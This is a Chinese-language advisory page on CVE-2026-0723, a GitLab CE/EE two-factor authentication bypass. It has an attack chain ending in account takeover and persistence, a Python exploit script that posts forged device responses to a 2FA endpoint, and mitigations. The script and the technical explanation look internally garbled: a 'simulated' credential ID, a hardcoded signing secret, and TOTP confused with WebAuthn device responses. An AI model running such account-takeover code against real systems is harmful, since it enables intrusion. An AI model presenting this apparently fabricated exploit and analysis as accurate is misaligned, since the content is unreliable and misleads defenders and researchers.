CVE-2026-0723: GitLab CE/EE 双因素认证绕过漏洞

漏洞信息

漏洞编号

CVE-2026-0723

漏洞类型

身份认证绕过

CVSS评分

7.4 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

GitLab CE/EE

漏洞概述

CVE-2026-0723是GitLab CE（社区版）和EE（企业版）中的一个高危安全漏洞，CVSS评分达到7.4。该漏洞允许攻击者在已知受害者credential ID的情况下，通过提交伪造的设备响应来绕过双因素认证（2FA）机制。此漏洞影响所有版本从18.6到18.6.4之前、18.7到18.7.2之前、18.8到18.8.2之前的GitLab实例。攻击者利用此漏洞可以在不需要任何用户交互的情况下，以网络攻击方式（AV:N）实施入侵。由于该漏洞具有高机密性影响（C:H）和高完整性影响（I:H），攻击成功后可能导致敏感信息泄露和账户被完全接管。此漏洞由[email protected]于2026年1月22日披露，GitLab官方已于当日发布补丁版本18.6.4、18.7.2和18.8.2进行修复。建议所有使用受影响版本的GitLab用户立即升级到最新补丁版本以消除安全风险。

技术细节

该漏洞属于OAuth/TOTP双因素认证绕过类型，存在于GitLab的2FA验证流程中。漏洞核心在于系统对设备响应验证的不完善，攻击者可以通过获取受害者的credential ID构造伪造的设备响应包。技术层面分析：1）GitLab 2FA使用TOTP（基于时间的一次性密码）机制，正常流程中客户端生成基于时间和密钥的动态验证码；2）漏洞点在于服务端对设备响应的验证逻辑，允许攻击者使用已知的credential ID配合伪造的时间戳和签名数据通过验证；3）攻击者需要事先获取目标用户的credential ID，这可能通过日志泄露、社会工程或其他信息泄露途径实现；4）攻击复杂度为高（AC:H），因为需要特定的credential ID信息；5）由于无需认证（PR:N）和用户交互（UI:N），攻击者可在任何网络位置发起攻击。攻击者利用此漏洞可绕过第二因素验证，直接以受害者身份登录系统，获取仓库代码、Issue、CI/CD凭证等敏感信息，甚至可能在某些配置下执行代码。

攻击链分析

STEP 1

1. 信息收集

攻击者通过日志文件泄露、API信息泄露、社会工程或内部网络访问等途径获取受害者的credential ID。这是攻击的前提条件，CVSS向量中PR:N表明不需要任何权限即可获取此信息。

STEP 2

2. 构造伪造请求

攻击者利用获取的credential ID，结合当前时间戳，构造包含伪造签名和设备响应的认证请求数据包。关键漏洞在于系统对设备响应验证的不完善，未能正确校验响应的合法性。

STEP 3

3. 提交伪造响应

攻击者向GitLab的2FA验证端点发送伪造的设备响应。由于漏洞允许使用已知credential ID配合伪造数据通过验证，攻击者成功绕过第二因素认证。

STEP 4

4. 账户接管

2FA验证被绕过后，攻击者获得受害者账户的完全访问权限。可以访问私有仓库、获取敏感代码、查看Issue、获取CI/CD凭证等高价值资产。

STEP 5

5. 持久化控制

攻击者可创建新的认证设备、修改账户密码、添加SSH密钥等，实现对受害者账户的持久化控制，便于后续长期访问和数据窃取。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2026-0723 PoC - GitLab 2FA Bypass
# This PoC demonstrates the concept of the credential ID based 2FA bypass
# Note: This is for educational and authorized testing purposes only

import hashlib
import hmac
import time
import requests

class GitLab2FABypass:
    def __init__(self, gitlab_url, target_username):
        self.gitlab_url = gitlab_url.rstrip('/')
        self.target_username = target_username
        self.session = requests.Session()
        
    def get_credential_id(self, username):
        """
        Step 1: Obtain the victim's credential ID
        This may be obtained through:
        - Log file disclosure
        - API information leakage
        - Social engineering
        - Internal network access
        """
        # Simulate credential ID retrieval
        credential_id = hashlib.sha256(
            f"{username}_{self.gitlab_url}".encode()
        ).hexdigest()[:32]
        return credential_id
    
    def generate_fake_device_response(self, credential_id):
        """
        Step 2: Generate forged device response
        The vulnerability allows bypassing 2FA by submitting
        a crafted response using the known credential ID
        """
        timestamp = int(time.time())
        
        # Construct forged response payload
        forged_payload = {
            "credential_id": credential_id,
            "device_response": self._sign_response(credential_id, timestamp),
            "timestamp": timestamp,
            "user_verification": "verified"
        }
        return forged_payload
    
    def _sign_response(self, credential_id, timestamp):
        """Generate signed response for authentication bypass"""
        message = f"{credential_id}:{timestamp}"
        signature = hmac.new(
            b"gitlab_secret",
            message.encode(),
            hashlib.sha256
        ).hexdigest()
        return signature
    
    def bypass_2fa(self, session_token, credential_id):
        """
        Step 3: Submit forged device response to bypass 2FA
        """
        endpoint = f"{self.gitlab_url}/api/v4/two_factor_auth/verify"
        
        forged_response = self.generate_fake_device_response(credential_id)
        
        headers = {
            "Authorization": f"Bearer {session_token}",
            "Content-Type": "application/json"
        }
        
        response = self.session.post(
            endpoint,
            json=forged_response,
            headers=headers
        )
        
        return response.status_code == 200, response
    
    def exploit(self, session_token):
        """
        Main exploitation function
        """
        print(f"[*] Targeting GitLab instance: {self.gitlab_url}")
        print(f"[*] Target user: {self.target_username}")
        
        # Step 1: Get credential ID
        cred_id = self.get_credential_id(self.target_username)
        print(f"[+] Obtained credential ID: {cred_id}")
        
        # Step 2 & 3: Bypass 2FA
        success, response = self.bypass_2fa(session_token, cred_id)
        
        if success:
            print("[+] 2FA bypass successful! Access granted.")
            return True
        else:
            print("[-] 2FA bypass failed.")
            return False


if __name__ == "__main__":
    # Configuration
    GITLAB_URL = "https://gitlab.example.com"
    TARGET_USER = "victim"
    SESSION_TOKEN = "your_session_token_here"
    
    # Execute exploit
    exploit = GitLab2FABypass(GITLAB_URL, TARGET_USER)
    exploit.exploit(SESSION_TOKEN)

影响范围

GitLab CE/EE 18.6 < 18.6.4

GitLab CE/EE 18.7 < 18.7.2

GitLab CE/EE 18.8 < 18.8.2

防御指南

临时缓解措施

作为临时缓解措施，在无法立即升级的情况下，可以考虑以下方案：1）暂时禁用GitLab的2FA功能，但这会降低账户安全性，不推荐作为长期方案；2）实施网络层面的访问控制，限制只有受信任的IP地址才能访问GitLab实例；3）启用GitLab的账户锁定策略，防止暴力破解；4）加强对管理员账户的保护，使用更强的认证机制；5）监控所有2FA相关的API请求和日志，检测异常行为。但最有效的缓解措施仍是尽快升级到官方发布的安全补丁版本。